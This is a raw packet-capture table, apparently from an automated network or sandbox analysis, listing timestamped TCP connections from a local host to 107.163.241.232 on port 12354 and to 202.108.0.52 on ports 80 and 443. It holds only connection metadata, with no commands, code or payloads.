                                              Dec 11, 2024 16:25:27.070115089 CET5027012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:27.070265055 CET5027012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:27.071881056 CET1235450267107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:27.189675093 CET1235450270107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:28.556572914 CET5027012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:28.556586981 CET5026712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:28.556615114 CET50260443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:28.557246923 CET5029512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:28.677073002 CET5029812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:28.677280903 CET1235450295107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:28.677504063 CET5029512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:28.677678108 CET5024480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:28.678307056 CET5029980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:28.678448915 CET5029512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:28.797725916 CET1235450298107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:28.797807932 CET5029812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:28.798531055 CET8050244202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:28.798543930 CET8050299202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:28.798603058 CET5024480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:28.798624992 CET5029980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:28.798649073 CET1235450295107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:28.835324049 CET5029812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:28.835434914 CET5029980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:28.956054926 CET1235450298107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:28.956073999 CET8050299202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:30.353166103 CET8050299202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:30.353246927 CET5029980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:30.392566919 CET50314443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:30.392676115 CET44350314202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:30.392776966 CET50314443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:30.393069983 CET50314443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:30.393105984 CET44350314202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:30.813726902 CET1235450295107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:30.815886974 CET5029512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:30.815984964 CET5029512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:30.816452026 CET5032112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:30.906749964 CET1235450298107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:30.908704042 CET5029812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:30.908787966 CET5029812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:30.938088894 CET5032412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:30.938699007 CET1235450295107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:30.939014912 CET1235450321107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:30.939121008 CET5032112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:30.939234972 CET5032112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:31.032028913 CET1235450298107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:31.062182903 CET1235450324107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:31.062272072 CET5032412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:31.063020945 CET1235450321107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:31.083494902 CET5032412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:31.210144997 CET1235450324107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:32.104912996 CET44350314202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:32.104998112 CET50314443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:32.105652094 CET44350314202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:32.105699062 CET50314443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:32.109205008 CET50314443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:32.109216928 CET44350314202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:32.109509945 CET44350314202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:32.109560966 CET50314443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:32.110269070 CET50314443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:32.151331902 CET44350314202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:32.556916952 CET5032412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:32.556917906 CET5032112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:32.556917906 CET50314443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:32.558516979 CET5035612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:32.671036005 CET5029980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:32.671375036 CET5035880192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:32.672620058 CET5035912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:32.681216955 CET1235450356107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:32.681360006 CET5035612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:32.681602955 CET5035612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:32.790658951 CET8050358202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:32.790752888 CET8050299202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:32.790760994 CET5035880192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:32.790822983 CET5029980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:32.792031050 CET1235450359107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:32.792089939 CET5035912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:32.800947905 CET1235450356107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:32.809689999 CET5035880192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:32.810214996 CET5035912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:32.929042101 CET8050358202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:32.929482937 CET1235450359107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:34.356770992 CET8050358202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:34.356832027 CET5035880192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:34.445384026 CET50384443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:34.445430040 CET44350384202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:34.445482969 CET50384443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:34.552460909 CET50384443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:34.552484989 CET44350384202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:34.813851118 CET1235450356107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:34.814073086 CET5035612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:34.814327002 CET5035612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:34.814479113 CET5038912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:34.907430887 CET1235450359107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:34.907607079 CET5035912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:34.907740116 CET5035912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:34.918612957 CET5039212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:34.933648109 CET1235450356107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:34.933810949 CET1235450389107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:34.933876038 CET5038912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:34.933986902 CET5038912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:35.027776003 CET1235450359107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:35.038134098 CET1235450392107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:35.038422108 CET5039212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:35.039336920 CET5039212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:35.053277016 CET1235450389107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:35.158715010 CET1235450392107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:36.244795084 CET44350384202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:36.244879961 CET50384443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:36.245296001 CET50384443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:36.245310068 CET44350384202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:36.246951103 CET50384443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:36.246969938 CET44350384202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:36.584445953 CET5038912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:36.584476948 CET5039212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:36.584489107 CET50384443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:36.586025000 CET5042312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:36.701822996 CET5042912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:36.702092886 CET5035880192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:36.702308893 CET5043080192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:36.705492973 CET1235450423107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:36.705574989 CET5042312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:36.705670118 CET5042312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:36.822258949 CET1235450429107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:36.822370052 CET5042912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:36.822737932 CET8050430202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:36.822751045 CET8050358202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:36.822789907 CET5043080192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:36.822819948 CET5035880192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:36.823462963 CET5042912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:36.823565960 CET5043080192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:36.826092958 CET1235450423107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:36.942936897 CET1235450429107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:36.942958117 CET8050430202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:38.405175924 CET8050430202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:38.408708096 CET5043080192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:38.410922050 CET50454443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:38.410996914 CET44350454202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:38.412657022 CET50454443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:38.412861109 CET50454443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:38.412887096 CET44350454202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:38.813668013 CET1235450423107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:38.816701889 CET5042312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:38.816788912 CET5042312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:03.212558985 CET5138612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:03.327491999 CET5147812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:03.330888987 CET1235451378107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:03.331429958 CET1235451468107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:03.331506968 CET5146812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:03.331675053 CET5146812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:03.332139969 CET1235451386107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:03.446943045 CET1235451478107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:03.447031021 CET5147812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:03.447772026 CET5147812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:03.451102972 CET1235451468107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:03.567025900 CET1235451478107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:04.856579065 CET51462443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:04.856856108 CET5146812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:04.856875896 CET5147812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:04.867506981 CET5156812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:04.986984015 CET1235451568107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:04.987065077 CET5156812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:04.987704039 CET5138780192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:04.988229036 CET5157680192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:04.988960981 CET5157712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:04.991905928 CET5156812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:05.107369900 CET8051387202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:05.107444048 CET8051576202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:05.107525110 CET5138780192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:05.107563019 CET5157680192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:05.107765913 CET5157680192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:05.108206987 CET1235451577107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:05.108263969 CET5157712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:05.108432055 CET5157712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:05.111356974 CET1235451568107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:05.227363110 CET8051576202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:05.227861881 CET1235451577107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:06.663619995 CET8051576202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:06.663722992 CET5157680192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:06.666045904 CET51630443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:06.666096926 CET44351630202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:06.668589115 CET51630443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:06.668889046 CET51630443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:06.668905973 CET44351630202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:07.095299006 CET1235451568107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:07.095422983 CET5156812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:07.110856056 CET5156812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:07.111308098 CET5165812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:07.221211910 CET1235451577107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:07.224591970 CET5157712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:07.224685907 CET5157712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:07.224972963 CET5166612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:07.231023073 CET1235451568107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:07.231297016 CET1235451658107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:07.231384039 CET5165812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:07.231511116 CET5165812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:07.345906019 CET1235451577107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:07.346173048 CET1235451666107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:07.348572969 CET5166612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:07.348721027 CET5166612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:07.352036953 CET1235451658107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:07.468424082 CET1235451666107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:08.372839928 CET44351630202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:08.372936964 CET51630443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:08.373677015 CET44351630202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:08.376547098 CET51630443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:08.424004078 CET51630443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:08.424025059 CET44351630202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:08.424400091 CET44351630202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:08.424469948 CET51630443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:08.424819946 CET51630443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:08.471328974 CET44351630202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:08.958612919 CET5166612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:08.958710909 CET5165812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:08.958740950 CET51630443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:08.971564054 CET5173912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:09.088530064 CET5174112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:09.089376926 CET5157680192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:09.089544058 CET5174280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:09.092860937 CET1235451739107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:09.092945099 CET5173912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:09.098010063 CET5173912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:09.208545923 CET1235451741107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:09.208614111 CET5174112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:09.208740950 CET5174112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:09.210736990 CET8051742202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:09.210752010 CET8051576202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:09.210813999 CET5157680192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:09.211011887 CET5174280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:09.211011887 CET5174280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:09.218189955 CET1235451739107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:09.328598976 CET1235451741107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:09.331367016 CET8051742202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:10.782651901 CET8051742202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:10.782754898 CET5174280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:10.785649061 CET51931443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:10.785675049 CET44351931202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:10.785789967 CET51931443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:10.786530972 CET51931443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:10.786540031 CET44351931202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:11.210558891 CET1235451739107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:11.210835934 CET5173912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:11.222328901 CET5173912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:11.222671032 CET5228812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:11.312696934 CET1235451741107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:11.312796116 CET5174112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:11.313075066 CET5174112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:11.341840029 CET5237412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:11.345366955 CET1235451739107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:11.345746994 CET1235452288107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:11.345820904 CET5228812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:11.346539021 CET5228812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:11.433037043 CET1235451741107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:11.461543083 CET1235452374107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:11.461642027 CET5237412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:11.462119102 CET5237412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:11.465863943 CET1235452288107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:11.582583904 CET1235452374107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:12.978532076 CET5228812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:12.978557110 CET51931443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:12.978584051 CET5237412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:12.980710030 CET5368612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:13.094079971 CET5381812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:13.095156908 CET5174280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:13.095396996 CET5382080192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:13.100344896 CET1235453686107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:13.100447893 CET5368612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:13.100939989 CET5368612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:13.214531898 CET1235453818107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:13.214618921 CET5381812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:13.214677095 CET8053820202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:13.214720964 CET5382080192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:13.214842081 CET8051742202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:13.214900970 CET5174280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:13.215796947 CET5381812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:13.216111898 CET5382080192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:13.220485926 CET1235453686107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:13.335351944 CET1235453818107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:13.335411072 CET8053820202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:14.781997919 CET8053820202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:14.782083988 CET5382080192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:14.784713984 CET55345443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:14.784761906 CET44355345202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:14.784835100 CET55345443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:14.785625935 CET55345443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:14.785638094 CET44355345202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:15.223535061 CET1235453686107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:15.223620892 CET5368612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:15.236938953 CET5368612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:15.237355947 CET5565412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:15.332950115 CET1235453818107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:15.333014011 CET5381812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:15.356903076 CET1235453686107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:15.357207060 CET1235455654107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:15.357278109 CET5565412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:15.377281904 CET5381812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:15.378324986 CET5565412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:15.466473103 CET5567312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:15.498275042 CET1235453818107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:15.499290943 CET1235455654107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:15.586039066 CET1235455673107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:15.588607073 CET5567312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:15.689882040 CET5567312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:15.809217930 CET1235455673107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:16.475660086 CET44355345202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:16.475769997 CET55345443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:16.478394032 CET44355345202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:16.478471041 CET55345443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:16.482691050 CET55345443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:16.482709885 CET44355345202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:16.483020067 CET44355345202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:16.483067036 CET55345443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:16.483443975 CET55345443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:16.527333975 CET44355345202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:16.994406939 CET5567312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:16.994436979 CET5565412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:16.994579077 CET55345443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:16.995085955 CET5625212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:17.109386921 CET5382080192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:17.109693050 CET5635780192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:17.111730099 CET5635812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:17.115272999 CET1235456252107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:17.115386963 CET5625212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:17.115521908 CET5625212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:17.228956938 CET8056357202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:17.229048967 CET5635780192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:17.229372978 CET5635780192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:17.229935884 CET8053820202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:17.229979992 CET5382080192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:17.231168032 CET1235456358107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:17.231226921 CET5635812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:17.232209921 CET5635812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:17.234761953 CET1235456252107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:17.350033998 CET8056357202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:17.351577997 CET1235456358107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:18.799427032 CET8056357202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:18.799690008 CET5635780192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:18.898044109 CET57162443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:18.898063898 CET44357162202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:18.898156881 CET57162443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:18.901995897 CET57162443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:26:18.902014971 CET44357162202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:26:19.223392963 CET1235456252107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:26:19.223526955 CET5625212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:26:19.233093023 CET5625212354192.168.2.4107.163.241.232
